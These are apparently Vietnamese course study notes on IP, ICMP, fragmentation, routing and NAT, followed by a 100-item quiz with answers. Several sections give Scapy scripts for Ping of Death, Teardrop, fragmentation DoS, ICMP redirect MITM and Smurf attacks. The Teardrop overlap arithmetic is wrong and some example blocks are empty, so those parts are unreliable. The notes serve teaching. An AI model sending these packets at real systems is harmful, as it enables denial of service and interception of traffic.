CHƯƠNG 8: NETWORK LAYER - IP - ICMP AND ATTACKS¤
PHẦN 1: NETWORK LAYER - KHÁI NIỆM CƠ BẢN¤
1. VAI TRÒ & CHỨC NĂNG¤
Transport segment từ sending đến receiving host:
Sender: - Encapsulates segments thành datagrams - Passes to link layer
Receiver: - Delivers segments to transport layer protocol
Network layer protocols: - Có trong EVERY Internet device: hosts, routers
Routers: - Examines header fields trong tất cả IP datagrams - Moves datagrams từ input ports đến output ports - Transfer datagrams theo end-end path
2. HAI CHỨC NĂNG CHÍNH¤
A. FORWARDING (Chuyển tiếp)¤
Định nghĩa: - Local, per-router function - Move packets từ router's input link đến appropriate output link
Tương tự: - Process of getting through single interchange
B. ROUTING (Định tuyến)¤
Định nghĩa: - Network-wide logic - Determine route taken by packets from source to destination - Uses routing algorithms
Tương tự: - Process of planning trip from source to destination
3. DATA PLANE VS CONTROL PLANE¤
A. DATA PLANE¤
Đặc điểm: - Local, per-router function - Determines how datagram arriving on router input port is forwarded to router output port - Uses forwarding table
B. CONTROL PLANE¤
Đặc điểm: - Network-wide logic - Determines how datagram is routed among routers along end-end path
Hai approaches:
1. Traditional Routing Algorithms: - Implemented IN routers - Routing Algorithm components trong mỗi router - Interact in control plane
2. Software-Defined Networking (SDN): - Implemented in REMOTE servers - Remote Controller computes, installs forwarding tables in routers - Centralized control
PHẦN 2: IP PROTOCOL¤
1. IP DATAGRAM FORMAT¤
Cấu trúc header (20 bytes minimum):
[Ver | IHL | ToS | Total Length]
[Identification | Flags | Fragment Offset]
[TTL | Protocol | Header Checksum]
[Source IP Address]
[Destination IP Address]
[Options (if any)]
[Payload Data]
Các fields quan trọng:
A. VERSION (4 bits)¤
- IP protocol version number
- IPv4 = 4
B. IHL - HEADER LENGTH (4 bits)¤
- Header length in 32-bit words
- Typically = 5 (5 × 4 = 20 bytes)
C. TYPE OF SERVICE (8 bits)¤
- DiffServ (bits 0:5)
- ECN (bits 6:7)
D. TOTAL LENGTH (16 bits)¤
- Total datagram length in bytes
- Maximum: 65,535 bytes (64KB)
- Typically: 1500 bytes or less
- Question: Can we overflow this value? → Attacks!
E. IDENTIFICATION (16 bits)¤
- Unique ID cho mỗi datagram
- Dùng cho fragmentation/reassembly
F. FLAGS (3 bits)¤
- Bit 0: Reserved (must be 0)
- Bit 1: DF (Don't Fragment)
- Bit 2: MF (More Fragments)
G. FRAGMENT OFFSET (13 bits)¤
- Vị trí của fragment trong original datagram
- Đơn vị: 8-byte blocks
- Why ÷ 8? Để tiết kiệm bits!
H. TIME-TO-LIVE (TTL) (8 bits)¤
- Remaining max hops
- Decremented at each router
- When TTL = 0 → router drops packet, sends ICMP Time Exceeded
I. PROTOCOL (8 bits)¤
- Upper layer protocol
- 6 = TCP
- 17 = UDP
- 1 = ICMP
J. HEADER CHECKSUM (16 bits)¤
- Error detection cho header only (NOT payload)
K. SOURCE IP ADDRESS (32 bits)¤
- Sender's IP
L. DESTINATION IP ADDRESS (32 bits)¤
- Receiver's IP
M. OPTIONS (variable)¤
- Timestamp, record route taken, etc.
Overhead: - 20 bytes IP + 20 bytes TCP = 40 bytes + app layer overhead
2. TTL VÀ TRACEROUTE¤
TTL (Time To Live): - Mục đích: Prevent infinite loops - Decremented tại mỗi router - When TTL = 0 → router drops, sends ICMP Type 11 Code 0 (Time Exceeded)
Traceroute hoạt động:
Steps: 1. Source sends sets of UDP segments to destination: - 1st set: TTL = 1 - 2nd set: TTL = 2 - 3rd set: TTL = 3, etc.
- Datagram in nth set arrives to nth router:
- Router discards datagram
- Sends source ICMP message (Type 11, Code 0)
-
ICMP message includes name of router & IP address
-
When ICMP arrives at source:
- Record RTTs (Round Trip Times)
Stopping criteria: - UDP segment arrives at destination host - Destination returns ICMP "port unreachable" (Type 3, Code 3) - Source stops
PHẦN 3: IP FRAGMENTATION¤
1. KHÁI NIỆM¤
Tại sao cần Fragmentation? - Network links có MTU (Max Transfer Size) - largest possible link-level frame - Different link types, different MTUs - VD: Ethernet = 1500 bytes
Quá trình: - Large IP datagram divided ("fragmented") within net - One datagram → several datagrams - Reassembled ONLY at destination (NOT at intermediate routers!) - IP header bits dùng để identify, order related fragments
2. VÍ DỤ FRAGMENTATION¤
Scenario: 4000-byte datagram, MTU = 1500 bytes
Original datagram:
Sau fragmentation:
Fragment 1:
ID = x
Offset = 0
Flag = 1 (More Fragments)
Length = 1500
Data = 1480 bytes (1500 - 20 header)
Fragment 2:
Fragment 3:
Lưu ý: - Offset = data_bytes ÷ 8 - Fragment 1: offset = 0 - Fragment 2: offset = 1480 ÷ 8 = 185 - Fragment 3: offset = (1480 + 1480) ÷ 8 = 370
Why offset ÷ 8? - Offset field chỉ có 13 bits - Max value = 8191 - Nếu không ÷ 8 → chỉ address được 8191 bytes - Với ÷ 8 → address được 8191 × 8 = 65,528 bytes (gần 64KB)
3. CONSTRUCT IP FRAGMENTS BẰNG SCAPY¤
from scapy.all import *
# Fragment 1
ip1 = IP(dst="10.9.0.5", id=1000, flags=1, frag=0, proto=17)
udp = UDP(sport=7070, dport=9090)
data1 = "A" * 1000
pkt1 = ip1/udp/data1
# Fragment 2
ip2 = IP(dst="10.9.0.5", id=1000, flags=0, frag=125, proto=17)
data2 = "B" * 500
pkt2 = ip2/Raw(load=data2)
send(pkt1)
send(pkt2)
Giải thích: - flags = 1: More Fragments - flags = 0: Last Fragment - frag = offset value - proto = 17: UDP - id phải giống nhau cho tất cả fragments
PHẦN 4: ATTACKS USING IP FRAGMENTATION¤
1. PROTOCOL VIOLATION¤
Khái niệm: - Protocols Are Rules - Attackers Like to Break Rules - Robust Programs phải Handle Rule Violations
Câu hỏi attack:
Q1: Can you create IP packet larger than 65,536 bytes (64KB)?
Q2: Can you create abnormal conditions using offset và payload size?
Q3: Can you use small bandwidth to tie up target's significant resources?
2. PING OF DEATH (PoD) ATTACK¤
Attack 1: Create Super-Large Packet
Idea: Violate IP protocol → buffer overflow
Cách: - Last fragment có: - offset = (65536 - 8) ÷ 8 = 8191 - total_length = 1000
Tính toán:
Real size = offset × 8 + (total_length - 20 - 8)
= 65528 + 972
= 66,500 bytes > 65,536 bytes!
Kết quả: - Vượt quá max IP packet size - Cause buffer overflow at victim - System crash
Code example:
from scapy.all import *
# Create super-large packet
ip = IP(dst="victim_ip")
icmp = ICMP()
# Last fragment
ip_frag = IP(dst="victim_ip", id=12345, flags=0, frag=8191)
payload = "X" * 1000
pkt = ip_frag/ICMP()/payload
send(pkt)
Recent PoD vulnerability: - CVE-2020-16898 (Windows TCP/IP Stack) - ICMPv6 Router Advertisement packets - Remote Code Execution!
Mitigation: - Validate total reassembled packet size - Drop packets exceeding limits - Update/patch systems
3. TEARDROP ATTACK¤
Attack 2: Create Abnormal Situations
Goal: Test whether computer can handle overlapping fragments
Normal fragments:
Check:
End of Fragment 1 = 0 + 820 = 820
Start of Fragment 2 = 200 × 8 = 1600
Gap = 1600 - 820 = 780 bytes → OK!
Teardrop attack:
Check:
End of Fragment 1 = 0 + 820 = 820
Start of Fragment 2 = 600 × 8 = 4800
Overlap = 820 - 4800 = -3980 (NEGATIVE!)
Kết quả: - Negative overlap → HUGE unsigned value - Cannot reassemble - System crash hoặc unexpected behavior
Code:
# Fragment 1
ip1 = IP(dst="victim", id=1000, flags=1, frag=0)
data1 = "A" * 800
pkt1 = ip1/ICMP()/data1
# Fragment 2 - OVERLAPPING!
ip2 = IP(dst="victim", id=1000, flags=0, frag=600)
data2 = "B" * 800
pkt2 = ip2/Raw(load=data2)
send(pkt1)
send(pkt2)
4. DENIAL OF SERVICE (DoS) VỚI FRAGMENTATION¤
Attack 3: Tie Up Target's Resources
Idea: Small bandwidth → significant resources
Cách:
Tác động:
Approach 1 (Static buffer): - Target allocates 64KB buffer chờ all fragments - Send 2 tiny packets (~100 bytes each) - Tie up 64KB resources on server!
Approach 2 (Linked list): - More complicated, time to implement - Still consumes resources
Kết quả: - Very efficient DoS attack - Small bandwidth → Large resource consumption
Code:
# Fragment 1 - first
ip1 = IP(dst="victim", id=1000, flags=1, frag=0)
pkt1 = ip1/ICMP()/"A"*50
# Fragment 2 - last (huge offset!)
ip2 = IP(dst="victim", id=1000, flags=0, frag=8190)
pkt2 = ip2/Raw(load="B"*50)
send(pkt1)
send(pkt2)
# Target allocates 64KB buffer, waits forever for middle fragments!
PHẦN 5: ROUTING¤
1. ROUTING TABLE¤
Linux routing commands:
Show routing table:
Add route:
Delete route:
2. ROUTING RULES - LONGEST MATCH¤
Example routing table:
A: 0.0.0.0/0 dev interface-a (default route)
B: 192.168.0.0/16 dev interface-b
C: 192.168.60.0/24 dev interface-a
D: 192.168.60.5/32 dev interface-d
Question: Interface nào được dùng cho:
1. 192.200.60.5? - Match: A (0.0.0.0/0) - Answer: interface-a (default route)
2. 192.168.30.5? - Match: A (0.0.0.0/0), B (192.168.0.0/16) - Longest match: B (/16 > /0) - Answer: interface-b
3. 192.168.60.5? - Match: A (0.0.0.0/0), B (192.168.0.0/16), C (192.168.60.0/24), D (192.168.60.5/32) - Longest match: D (/32 > /24 > /16 > /0) - Answer: interface-d
Bottom line: Pick the LONGEST MATCH!
3. ROUTING TABLE CONFIGURATION¤
For Routers: - Routing protocols (e.g., OSPF, BGP) - Attacks on routing protocols (will be discussed)
For Hosts (tiny routing table): - DHCP (IP, DNS, router info) - Default routers - Manual configuration (static routes) - ICMP redirect messages
4. REVERSE PATH FILTERING (RPF)¤
Threat: Spoofing from outside network - Outside attacker sử dụng internal source IP - Pretending to be inside → cause damage
Router's protection: RPF
Symmetric routing: 1. Router R receives packet from interface A 2. Do reverse lookup: Nếu return path to src_ip đi qua cùng interface A? - YES → Allow (symmetric) - NO → Drop (asymmetric)
Related term: Reverse-Path Forwarding (RPF)
Lưu ý: - Very obscure and important rule inside Linux Kernel - Provides protection against packet spoofing
Demo - spoofing sẽ bị RPF drop:
# Spoof packet from outside with internal src IP
ip = IP(src="10.0.2.5", dst="192.168.60.5") # Internal src, external dst
send(ip/ICMP())
# Router sẽ drop vì reverse path không match incoming interface!
PHẦN 6: ICMP PROTOCOL¤
1. MỤC ĐÍCH¤
ICMP (Internet Control Message Protocol): - Used by hosts and routers to communicate network-level information
Chức năng:
Error reporting: - Unreachable host, network, port, protocol - Time exceeded (TTL = 0)
Control messages: - Echo request/reply (ping) - Redirect - Timestamp request/reply - Router advertisement/solicitation
Đặc điểm: - ICMP messages carried in IP datagrams - ICMP message: type, code + first 8 bytes of IP datagram causing error
2. ICMP MESSAGE TYPES¤
Các loại quan trọng:
| Type | Code | Description |
|---|---|---|
| 0 | 0 | Echo Reply (ping) |
| 3 | 0 | Dest Network Unreachable |
| 3 | 1 | Dest Host Unreachable |
| 3 | 2 | Dest Protocol Unreachable |
| 3 | 3 | Dest Port Unreachable |
| 3 | 6 | Dest Network Unknown |
| 3 | 7 | Dest Host Unknown |
| 4 | 0 | Source Quench (congestion - deprecated) |
| 8 | 0 | Echo Request (ping) |
| 9 | 0 | Router Advertisement |
| 10 | 0 | Router Discovery |
| 11 | 0 | TTL Expired |
| 12 | 0 | Bad IP Header |
3. ICMP ECHO REQUEST/REPLY (PING)¤
Workflow:
Scapy:
# Echo Request
ip = IP(dst="10.9.0.5")
icmp = ICMP(type=8, code=0)
send(ip/icmp)
# Echo Reply
ip = IP(dst="10.9.0.6")
icmp = ICMP(type=0, code=0)
send(ip/icmp)
4. ICMP TIME EXCEEDED¤
When TTL = 0: - Router drops packet - Sends ICMP Type 11, Code 0 (Time Exceeded) to source - Includes first 8 bytes of original IP datagram
Traceroute sử dụng!
5. ICMP DESTINATION UNREACHABLE¤
Type 3, various codes: - Code 0: Network Unreachable - Code 1: Host Unreachable - Code 2: Protocol Unreachable - Code 3: Port Unreachable (UDP port not listening)
6. ICMP REDIRECT¤
Mục đích: Tell host về better route
Scenario:
Host A → Router R1 → Router R2 → Host B
R1 knows: Better route = direct to R2
R1 sends ICMP Redirect to A: "Use R2 for B"
ICMP Redirect message: - Type 5, Code 0 - Contains: Better gateway IP address
Scapy:
ip = IP(src="10.9.0.11", dst="10.9.0.5") # Router → Host
icmp = ICMP(type=5, code=0)
icmp.gw = "10.9.0.111" # New gateway IP
send(ip/icmp/original_ip_header)
Attacker → MITM Attack using ICMP Redirect!
PHẦN 7: ICMP REDIRECT ATTACK¤
1. ATTACK CODE¤
#!/usr/bin/env python3
from scapy.all import *
# Victim: 10.9.0.5
# Fake gateway: 10.9.0.111 (attacker-controlled)
# Original gateway: 10.9.0.11
# Spoof ICMP Redirect from gateway to victim
ip = IP(src="10.9.0.11", dst="10.9.0.5")
icmp = ICMP(type=5, code=0)
icmp.gw = "10.9.0.111" # Redirect to attacker
# Include original IP header (first 8 bytes of triggering packet)
# Victim was sending to some destination
orig_ip = IP(src="10.9.0.5", dst="192.168.60.5")
orig_icmp = ICMP()
send(ip/icmp/orig_ip/orig_icmp)
Kết quả: - Victim updates routing table - Traffic to 192.168.60.0/24 → goes through 10.9.0.111 (attacker) - MITM attack!
2. LIMITATIONS¤
Question 1: Can you launch ICMP redirect from remote computer?
Answer: NO! - When receiving ICMP Redirect, host checks if gateway is on same network - If NOT → ignore
Question 2: Can you redirect to remote computer?
Answer: NO! - Reverse Path Filtering (RPF) at router will drop spoofed packets - New gateway phải on same subnet
Bottom line: - ICMP Redirect chỉ hoạt động locally (same LAN)
PHẦN 8: DoS ATTACKS USING ICMP¤
1. SMURF ATTACK¤
Attack idea:
Step 1: Spoof ICMP Echo Request - Source IP = Victim's IP (spoofed!) - Destination = Broadcast address (VD: 10.9.0.255)
Step 2: All hosts on network receive - Think victim sent Echo Request - All reply to victim with Echo Reply!
Step 3: Victim overwhelmed - Receives hundreds/thousands of Echo Replies - Denial of Service!
Diagram:
Attacker → Spoofed Echo Request (src=Victim, dst=Broadcast)
→ All hosts on network receive
→ All hosts reply to Victim
→ Victim OVERWHELMED!
Code:
# Smurf attack
ip = IP(src="victim_ip", dst="10.9.0.255") # Broadcast
icmp = ICMP(type=8) # Echo Request
send(ip/icmp)
# All hosts reply to victim!
Demo: Ping broadcast address
Prevention: - Configure routers to NOT forward broadcast packets - Disable ICMP Echo Reply to broadcast addresses - Rate limiting
2. ICMP FLOODING¤
Attack: - Send massive amount of ICMP Echo Requests - Overwhelm victim's bandwidth/processing
Tools:
- hping3, ping with high rate
Prevention: - Rate limiting ICMP - Firewall rules
3. RECONNAISSANCE¤
Using ICMP for network mapping: - Ping sweep: Discover live hosts - Traceroute: Map network topology - ICMP Timestamp: Get system time
Tools:
- nmap -sn (ping scan)
- traceroute
PHẦN 9: NAT (NETWORK ADDRESS TRANSLATION)¤
1. KHÁI NIỆM¤
Mục đích: - All devices in local network share ONE IPv4 address (as far as outside world concerned)
Cách hoạt động:
Local network:
Outside world thấy:
2. NAT TRANSLATION¤
Outgoing: 1. Host 10.0.0.1:3345 → 128.119.40.186:80 2. NAT router changes: - Source: 10.0.0.1:3345 → 138.76.29.7:5001 - Destination: 128.119.40.186:80 (giữ nguyên) 3. Updates NAT translation table:
Incoming: 1. Reply: 128.119.40.186:80 → 138.76.29.7:5001 2. NAT router looks up table: - 138.76.29.7:5001 → 10.0.0.1:3345 3. Changes destination: - 128.119.40.186:80 → 10.0.0.1:3345 4. Delivers to internal host
Đặc điểm: - Datagrams leaving local network: same source NAT IP, different source ports - Datagrams inside network: 10.0.0/24 addresses (as usual)
NGÂN HÀNG CÂU HỎI CHƯƠNG 8¤
PHẦN 1: NETWORK LAYER BASICS¤
Câu 1: Network layer transport gì?
A. Frames
B. Segments from sending to receiving host ✓
C. Bits
D. Messages
Câu 2: Sender encapsulates gì thành datagrams?
A. Frames
B. Segments ✓
C. Packets
D. Messages
Câu 3: Network layer protocols có ở đâu?
A. Chỉ routers
B. Chỉ hosts
C. Every Internet device: hosts, routers ✓
D. Chỉ switches
Câu 4: Routers examines gì trong datagrams?
A. Chỉ destination IP
B. Header fields ✓
C. Chỉ payload
D. Chỉ checksum
Câu 5: Forwarding là gì?
A. Planning trip
B. Move packets from input link to output link (local, per-router) ✓
C. Global routing
D. Error correction
Câu 6: Routing là gì?
A. Local forwarding
B. Determine route from source to destination (network-wide logic) ✓
C. Error checking
D. Compression
Câu 7: Forwarding tương tự như gì?
A. Planning entire trip
B. Getting through single interchange ✓
C. Choosing destination
D. Buying ticket
Câu 8: Routing tương tự như gì?
A. Driving through one intersection
B. Planning trip from source to destination ✓
C. Stopping at one place
D. Refueling
Câu 9: Data plane là gì?
A. Global logic
B. Local, per-router function - forwarding ✓
C. Remote control
D. Application layer
Câu 10: Control plane là gì?
A. Local forwarding
B. Network-wide logic - routing ✓
C. Data transmission
D. Error handling
Câu 11: Hai approaches của Control plane?
A. Fast and Slow
B. Traditional routing algorithms VÀ SDN ✓
C. Manual and Automatic
D. Wired and Wireless
Câu 12: Traditional routing algorithms implemented ở đâu?
A. Remote servers
B. IN routers ✓
C. Cloud
D. Hosts only
Câu 13: SDN (Software-Defined Networking) implemented ở đâu?
A. In routers
B. Remote servers ✓
C. Switches
D. Hosts
Câu 14: SDN, ai computes forwarding tables?
A. Each router independently
B. Remote Controller ✓
C. Switches
D. Hosts
PHẦN 2: IP DATAGRAM FORMAT¤
Câu 15: IP header minimum size?
A. 8 bytes
B. 20 bytes ✓
C. 32 bytes
D. 40 bytes
Câu 16: IP Version field cho IPv4?
A. 1
B. 2
C. 4 ✓
D. 6
Câu 17: IHL (Header Length) đơn vị?
A. Bytes
B. 32-bit words ✓
C. Bits
D. KB
Câu 18: IHL typically bằng bao nhiêu?
A. 4
B. 5 (5 × 4 = 20 bytes) ✓
C. 10
D. 20
Câu 19: Total Length field có bao nhiêu bits?
A. 8
B. 16 ✓
C. 32
D. 64
Câu 20: Maximum IP datagram size?
A. 1500 bytes
B. 65,535 bytes (64KB) ✓
C. 1 MB
D. Unlimited
Câu 21: Typically IP datagram size?
A. 64 KB
B. 1500 bytes or less ✓
C. 100 bytes
D. 10 KB
Câu 22: Flags field có bao nhiêu bits?
A. 1
B. 2
C. 3 ✓
D. 8
Câu 23: MF flag nghĩa là gì?
A. Must Forward
B. More Fragments ✓
C. Maximum Forward
D. Minimum Fragments
Câu 24: Fragment Offset field có bao nhiêu bits?
A. 8
B. 13 ✓
C. 16
D. 32
Câu 25: Fragment Offset đơn vị?
A. Bytes
B. 8-byte blocks ✓
C. Bits
D. 32-bit words
Câu 26: Tại sao Fragment Offset ÷ 8?
A. Faster calculation
B. Tiết kiệm bits, address được 65,528 bytes thay vì 8,191 ✓
C. Easier to understand
D. Random choice
Câu 27: TTL là gì?
A. Total Transfer Length
B. Time To Live - remaining max hops ✓
C. Type To Link
D. Transport Layer Level
Câu 28: TTL được làm gì tại mỗi router?
A. Tăng lên 1
B. Decremented (giảm đi 1) ✓
C. Giữ nguyên
D. Reset về 255
Câu 29: When TTL = 0, router làm gì?
A. Forward packet
B. Drops packet, sends ICMP Time Exceeded ✓
C. Increase TTL
D. Broadcast packet
Câu 30: Protocol field = 6 nghĩa là gì?
A. UDP
B. TCP ✓
C. ICMP
D. IP
Câu 31: Protocol field = 17 nghĩa là gì?
A. TCP
B. UDP ✓
C. ICMP
D. ARP
Câu 32: Protocol field = 1 nghĩa là gì?
A. TCP
B. UDP
C. ICMP ✓
D. HTTP
Câu 33: Header Checksum check gì?
A. Entire datagram
B. Header only (NOT payload) ✓
C. Chỉ payload
D. Chỉ Source IP
Câu 34: IP overhead với TCP?
A. 20 bytes
B. 40 bytes
C. 20 bytes IP + 20 bytes TCP = 40 bytes + app overhead ✓
D. 60 bytes
PHẦN 3: TTL & TRACEROUTE¤
Câu 35: TTL mục đích chính?
A. Security
B. Prevent infinite loops ✓
C. Encryption
D. Compression
Câu 36: Traceroute gửi gì đến destination?
A. ICMP
B. TCP
C. UDP segments ✓
D. ARP
Câu 37: Traceroute 1st set có TTL bao nhiêu?
A. 0
B. 1 ✓
C. 64
D. 255
Câu 38: Traceroute 2nd set có TTL bao nhiêu?
A. 1
B. 2 ✓
C. 10
D. 20
Câu 39: nth router sends ICMP message type/code nào?
A. Type 0, Code 0
B. Type 11, Code 0 (Time Exceeded) ✓
C. Type 3, Code 3
D. Type 8, Code 0
Câu 40: Traceroute stops khi nào?
A. TTL = 255
B. Destination returns ICMP Type 3 Code 3 (Port Unreachable) ✓
C. No reply
D. After 10 hops
PHẦN 4: IP FRAGMENTATION¤
Câu 41: MTU là gì?
A. Minimum Transfer Unit
B. Max Transfer Size - largest possible link-level frame ✓
C. Multiple Transfer Unit
D. Media Type Unit
Câu 42: Ethernet MTU typically?
A. 576 bytes
B. 1500 bytes ✓
C. 4000 bytes
D. 64 KB
Câu 43: IP datagram được reassembled ở đâu?
A. First router
B. Every router
C. ONLY at destination ✓
D. Source
Câu 44: Fragment 1 của 4000-byte datagram (MTU=1500), Length?
A. 4000
B. 1500 ✓
C. 1480
D. 20
Câu 45: Fragment 1, Data size (không tính header)?
A. 1500
B. 1480 (1500 - 20) ✓
C. 1460
D. 20
Câu 46: Fragment 2 offset (sau 1480 bytes data)?
A. 1480
B. 185 (1480 ÷ 8) ✓
C. 200
D. 1500
Câu 47: Last fragment có flag gì?
A. 1
B. 0 (No More Fragments) ✓
C. 2
D. 3
Câu 48: Middle fragments có flag gì?
A. 0
B. 1 (More Fragments) ✓
C. 2
D. 3
PHẦN 5: IP FRAGMENTATION ATTACKS¤
Câu 49: Protocol Violation nghĩa là gì?
A. Following rules
B. Breaking protocol rules ✓
C. Encrypting data
D. Compressing packets
Câu 50: Ping of Death attack làm gì?
A. Send normal pings
B. Create IP packet LARGER than 65,536 bytes ✓
C. Delete packets
D. Encrypt packets
Câu 51: PoD attack cause gì?
A. Slow network
B. Buffer overflow ✓
C. Fast forwarding
D. Encryption error
Câu 52: Last fragment với offset=8191, length=1000, real size?
A. 65,536
B. 66,500 bytes (> 65,536!) ✓
C. 64,000
D. 8,191
Câu 53: CVE-2020-16898 là gì?
A. ARP vulnerability
B. Windows TCP/IP Stack PoD in ICMPv6 ✓
C. DNS bug
D. HTTP flaw
Câu 54: Teardrop attack tạo gì?
A. Normal fragments
B. Overlapping fragments ✓
C. Encrypted fragments
D. Compressed fragments
Câu 55: Teardrop: Fragment 1 offset=0 length=820, Fragment 2 offset=600, overlap?
A. No overlap
B. Gap
C. Negative overlap (HUGE unsigned value) ✓
D. Perfect fit
Câu 56: DoS với fragmentation, send bao nhiêu packets?
A. Thousands
B. Millions
C. 2 tiny packets (~100 bytes each) ✓
D. One large packet
Câu 57: DoS fragmentation tie up bao nhiêu resources?
A. 100 bytes
B. 1 KB
C. 64 KB ✓
D. 1 MB
Câu 58: Fragmentation DoS efficient vì sao?
A. Fast
B. Small bandwidth → Large resource consumption ✓
C. Encrypted
D. Compressed
PHẦN 6: ROUTING¤
Câu 59: Linux command để show routing table?
A. ifconfig
B. netstat
C. ip route ✓
D. route -n
Câu 60: Linux command để add route?
A. route add
B. sudo ip route add ✓
C. ifconfig add
D. netstat add
Câu 61: Routing rule chính?
A. First match
B. Longest match ✓
C. Shortest match
D. Random
Câu 62: 192.168.60.5 match với: /0, /16, /24, /32. Chọn nào?
A. /0
B. /16
C. /24
D. /32 (longest!) ✓
Câu 63: Routers configure routing table bằng gì?
A. Chỉ manual
B. Routing protocols (OSPF, BGP) ✓
C. Chỉ DHCP
D. Chỉ DNS
Câu 64: Hosts configure routing table bằng gì?
A. Chỉ routing protocols
B. DHCP, default routers, manual, ICMP redirect ✓
C. Chỉ DHCP
D. Chỉ manual
Câu 65: RPF viết tắt của gì?
A. Rapid Packet Forwarding
B. Reverse Path Filtering / Reverse-Path Forwarding ✓
C. Random Protocol Function
D. Router Protection Feature
Câu 66: RPF bảo vệ chống gì?
A. Virus
B. Packet spoofing ✓
C. DDoS only
D. Encryption
Câu 67: RPF hoạt động như thế nào?
A. Block all packets
B. Reverse lookup: return path same interface → Allow, else Drop ✓
C. Forward all
D. Encrypt packets
Câu 68: Symmetric routing trong RPF?
A. Drop packet
B. Allow packet (return path same interface) ✓
C. Encrypt packet
D. Broadcast packet
Câu 69: Asymmetric routing trong RPF?
A. Allow packet
B. Drop packet (return path different interface) ✓
C. Forward packet
D. Modify packet
PHẦN 7: ICMP PROTOCOL¤
Câu 70: ICMP viết tắt của gì?
A. Internet Connection Management Protocol
B. Internet Control Message Protocol ✓
C. Internal Communication Message Protocol
D. IP Control Management Protocol
Câu 71: ICMP được dùng bởi ai?
A. Chỉ hosts
B. Chỉ routers
C. Hosts VÀ routers ✓
D. Chỉ switches
Câu 72: ICMP communicate gì?
A. Application data
B. Network-level information ✓
C. Chỉ errors
D. Chỉ routing
Câu 73: ICMP messages được carried trong gì?
A. Ethernet frames only
B. IP datagrams ✓
C. TCP segments
D. UDP packets
Câu 74: ICMP Type 0 Code 0 là gì?
A. Echo Request
B. Echo Reply (ping) ✓
C. Time Exceeded
D. Unreachable
Câu 75: ICMP Type 8 Code 0 là gì?
A. Echo Reply
B. Echo Request (ping) ✓
C. Time Exceeded
D. Unreachable
Câu 76: ICMP Type 11 Code 0 là gì?
A. Echo Reply
B. Unreachable
C. TTL Expired / Time Exceeded ✓
D. Redirect
Câu 77: ICMP Type 3 Code 3 là gì?
A. Network Unreachable
B. Host Unreachable
C. Dest Port Unreachable ✓
D. Echo Reply
Câu 78: ICMP Type 5 Code 0 là gì?
A. Echo Request
B. Time Exceeded
C. Redirect ✓
D. Unreachable
Câu 79: Ping sử dụng ICMP type nào?
A. Type 11
B. Type 8 (Request) và Type 0 (Reply) ✓
C. Type 3
D. Type 5
Câu 80: Traceroute sử dụng ICMP type nào để receive?
A. Type 0
B. Type 8
C. Type 11 (Time Exceeded) ✓
D. Type 5
PHẦN 8: ICMP REDIRECT ATTACK¤
Câu 81: ICMP Redirect mục đích legitimate?
A. Attack only
B. Tell host về better route ✓
C. Encrypt traffic
D. Block traffic
Câu 82: ICMP Redirect contains gì?
A. Entire routing table
B. Better gateway IP address ✓
C. All routes
D. DNS info
Câu 83: ICMP Redirect Type và Code?
A. Type 0, Code 0
B. Type 8, Code 0
C. Type 5, Code 0 ✓
D. Type 11, Code 0
Câu 84: Attacker dùng ICMP Redirect để?
A. DoS
B. MITM attack ✓
C. Sniffing only
D. Encryption
Câu 85: ICMP Redirect có thể launch từ remote không?
A. Có
B. KHÔNG - host checks gateway on same network ✓
C. Tùy firewall
D. Chỉ với VPN
Câu 86: ICMP Redirect có thể redirect đến remote computer không?
A. Có
B. KHÔNG - RPF drops, gateway must be same subnet ✓
C. Tùy router
D. Chỉ TCP
Câu 87: ICMP Redirect hoạt động ở đâu?
A. Globally
B. Locally (same LAN) ✓
C. Internet-wide
D. Cloud only
PHẦN 9: SMURF ATTACK & ICMP DoS¤
Câu 88: Smurf attack sử dụng gì?
A. TCP SYN
B. ICMP Echo Request to broadcast address ✓
C. UDP flood
D. ARP poisoning
Câu 89: Smurf attack spoofs gì?
A. Destination IP
B. Source IP = Victim's IP ✓
C. MAC address
D. Port number
Câu 90: Smurf attack destination?
A. Unicast
B. Broadcast address ✓
C. Multicast
D. Loopback
Câu 91: Smurf attack, all hosts làm gì?
A. Ignore
B. Forward
C. Reply to victim with Echo Reply ✓
D. Block
Câu 92: Smurf attack cause gì cho victim?
A. Speed up
B. Overwhelmed with Echo Replies - DoS ✓
C. Security improvement
D. Nothing
Câu 93: Prevention cho Smurf attack?
A. Use TCP
B. Configure routers to NOT forward broadcast packets, disable ICMP to broadcast ✓
C. Use VPN
D. Stronger passwords
Câu 94: ICMP Flooding là gì?
A. Normal pings
B. Send massive amount of ICMP Echo Requests ✓
C. One ping
D. Encrypted ICMP
Câu 95: ICMP dùng cho Reconnaissance như thế nào?
A. Not possible
B. Ping sweep: discover live hosts; Traceroute: map topology ✓
C. Chỉ encryption
D. Chỉ authentication
PHẦN 10: NAT¤
Câu 96: NAT viết tắt của gì?
A. Network Authentication Technology
B. Network Address Translation ✓
C. New Advanced Transmission
D. National Address Table
Câu 97: NAT cho phép gì?
A. Faster Internet
B. All devices in local network share ONE IPv4 address ✓
C. More security only
D. Encryption
Câu 98: Datagrams leaving local network có gì giống nhau?
A. Destination
B. Same source NAT IP, different source ports ✓
C. Protocol
D. TTL
Câu 99: NAT translation table chứa gì?
A. Chỉ IP addresses
B. Chỉ ports
C. WAN side addr:port ↔ LAN side addr:port ✓
D. MAC addresses
Câu 100: NAT router làm gì với outgoing packet?
A. Chỉ forward
B. Changes source IP:port to NAT public IP:new port, updates table ✓
C. Drops packet
D. Encrypts packet
ĐÁP ÁN NHANH¤
1.B 2.B 3.C 4.B 5.B 6.B 7.B 8.B 9.B 10.B 11.B 12.B 13.B 14.B 15.B 16.C 17.B 18.B 19.B 20.B 21.B 22.C 23.B 24.B 25.B 26.B 27.B 28.B 29.B 30.B 31.B 32.C 33.B 34.C 35.B 36.C 37.B 38.B 39.B 40.B 41.B 42.B 43.C 44.B 45.B 46.B 47.B 48.B 49.B 50.B 51.B 52.B 53.B 54.B 55.C 56.C 57.C 58.B 59.C 60.B 61.B 62.D 63.B 64.B 65.B 66.B 67.B 68.B 69.B 70.B 71.C 72.B 73.B 74.B 75.B 76.C 77.C 78.C 79.B 80.C 81.B 82.B 83.C 84.B 85.B 86.B 87.B 88.B 89.B 90.B 91.C 92.B 93.B 94.B 95.B 96.B 97.B 98.B 99.C 100.B
BẢNG TÓM TẮT NHANH - CHƯƠNG 8¤
1. NETWORK LAYER¤
- Forwarding: Local, move packets input→output
- Routing: Global, determine paths, routing algorithms
- Data plane: Local forwarding
- Control plane: Network-wide routing (Traditional in routers, SDN remote)
2. IP HEADER¤
